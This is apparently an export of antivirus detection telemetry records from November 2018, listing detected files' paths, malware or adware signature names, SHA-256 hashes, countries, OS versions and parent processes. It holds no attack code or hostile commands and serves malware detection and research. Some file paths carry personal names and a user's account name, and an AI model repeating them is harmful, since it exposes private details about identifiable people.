  Row(detection=Row(filename='avscan-20181101-191107-2e6ee63f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191107-2E6EE63F', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132647-b2d8c096', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8732e122\\AVSCAN-20181101-124327-EDF9E5E7\\AVSCAN-20181101-132647-B2D8C096', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='loukou wa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\LOUKOU WA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ilchxgjadly\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='saidi salma.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\SAIDI SALMA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ed17d199416355b4980a6314211f4072d4f5f401ed69003e15d673832d8ef22f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\ED17D199416355B4980A6314211F4072D4F5F401ED69003E15D673832D8EF22F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ed17d199416355b4980a6314211f4072d4f5f401ed69003e15d673832d8ef22f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='922500ddc62333f8bbbff17e343518a3b40d6f7cbb4a8a83498de8cd7e73ae7e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\922500DDC62333F8BBBFF17E343518A3B40D6F7CBB4A8A83498DE8CD7E73AE7E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='922500ddc62333f8bbbff17e343518a3b40d6f7cbb4a8a83498de8cd7e73ae7e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T04:05:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T04:13:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-232734-e61e8b1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-231948-AC4520AC\\AVSCAN-20181101-232734-E61E8B1E', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1mpf5ui21k2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541017899.5bda112b7865d', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Backs\\362838467.exe', parentsize=671232, timestamp='2018-11-01T08:21:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\Desktop\\yedek\\hob\\YedeK\\huseyin\\AppData\\Local\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='cf1c0582fc6f2439107bc2a9b19e001f7ad5b8733a99e3c247aff85107152e3d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:36:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mylbotmslqts.bat', filepath='C:\\mylbotmslqts.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093547-9af59650', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093547-9AF59650', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\iw1nhgq521j\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539840173.5bc818adaa5b1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\AZ\\4677077.exe', parentsize=671232, timestamp='2018-11-01T11:36:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094754-26588d37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094754-26588D37', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:48:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfi asa 582580.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI ASA 582580.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104522-3512dbc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-104437-2C83888E\\AVSCAN-20181101-104522-3512DBC8', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a6fb33563b388ee7f70756d2fcc1f94a52c2427f2d8bc8f63b6cdbeb9db48176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='the marine 4.exe', filepath='F:\\\xa0\\The Marine 4\\The Marine 4.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094733-2255c11e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094733-2255C11E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stronghold crusadermgr.exe', filepath='C:\\Users\\X\\Desktop\\hard\\1\\Stronghold Crusadermgr.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3048fd0aa79bafe42cfdad11afbb3047db01f277a1aa4ecf8e773ae2e7688e13', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:PAYKxkRkvUCtwwVO.1', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T08:19:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225454-235a41ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e7bd116\\AVSCAN-20181104-225227-1042A9D6\\AVSCAN-20181104-225454-235A41EA', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='33d69fa6ccc1befaa7873fd9d41937925752c0237be06c1be9ec2c72c4c9ee02', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:54:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f490', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f490', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134256-b993d333', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_97489ba2\\AVSCAN-20181104-133211-50CE7618\\AVSCAN-20181104-134256-B993D333', filesize=384000, name='TR/Flooder.384000.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ee499f74d0c863e1c36084c99671bb41559b845f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\ee499f74d0c863e1c36084c99671bb41559b845f', filesize=1152000, name='ADWARE/MultiPlug.Gen7.#M300.#R601271'), hash='1ace1ee44afc60c46833aa1ebe2bd82b55ada7e4c077f0babff690eb7055605a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:04:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T21:22:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140133-a93aae8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68715a38\\AVSCAN-20181104-132010-5D814B12\\AVSCAN-20181104-140133-A93AAE8C', filesize=704000, name='HEUR/AGEN.1032303.#M1.#R1'), hash='190aa5a21b5a9c00dfd1560a0d9b6cfbe728726d3ab34d3d57e07151df3f6441', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:01:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cdwizard.exe', filepath='C:\\Program Files (x86)\\Steinberg\\WaveLab 6\\CDWizard.exe', filesize=3584000, name='W32/Neshta.A.#M1.#R1'), hash='7df6c5b0664cf192ffa10227b16287b10c47d0c300b9e332f1441046d28e1a52', metadata=Row(cmdline='\\\\\\/c', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-04T18:37:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152014-ce70bf90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-152014-CE70BF90', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gzg.exe', filepath='\\\\?\\C:\\ProgramData\\GZG\\GZG.exe', filesize=2752000, name='SPR/Tool.Monitor.Gen.#M1.#R1'), hash='78c50eac5ef1e2f2556efc7bf652caea34183377a21a938301f9223799907f2f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:02:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:38:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213355-c856e26d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-213355-C856E26D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:33:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140322-f82867fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140322-F82867FC', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185628-dc0bf450', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6506c9b6\\AVSCAN-20181104-183401-205EFF6B\\AVSCAN-20181104-185628-DC0BF450', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:56:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093141-0db231d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d62c89d\\AVSCAN-20181104-093039-0492B89C\\AVSCAN-20181104-093141-0DB231D7', filesize=4992000, name='DR/Delphi.Gen.#M1.#R1'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:31:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10345936\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:21:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a8b097684af447f22488aa9bd222c28a6089fb0cc3072199d2d371a4508f39fe', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A8B097684AF447F22488AA9BD222C28A6089FB0CC3072199D2D371A4508F39FE', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='a8b097684af447f22488aa9bd222c28a6089fb0cc3072199d2d371a4508f39fe', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:10:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152907-340f942e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32d45866\\AVSCAN-20181104-152742-2CB127D2\\AVSCAN-20181104-152907-340F942E', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline=None, country='NI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T22:29:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='D:\\@STEAM!\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:36:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='449bb00b4cfac82b665cb2352cacf6166a7652303fa7e83dbb6d1183c34a3280', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:47:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T11:51:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200517-077858ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200517-077858FF', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:05:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204244-2a015ff0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_21d84954\\AVSCAN-20181104-203904-1290D8EE\\AVSCAN-20181104-204244-2A015FF0', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:42:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T01:29:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T04:12:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195549-8be0cb42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-195549-8BE0CB42', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autoupdater.exe', filepath='\\\\?\\C:\\MCoffline\\MCoffline\\programs\\Program Files\\loader\\Autoupdater.exe', filesize=2944000, name='W32/Neshta.A.#M1.#R1'), hash='7163430361a2a624a529c5014db1b9e654f43c4207850191223c8e6c885d2b9b', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:45:32Z'), dt=datetime.date(2018, 11, 4)),
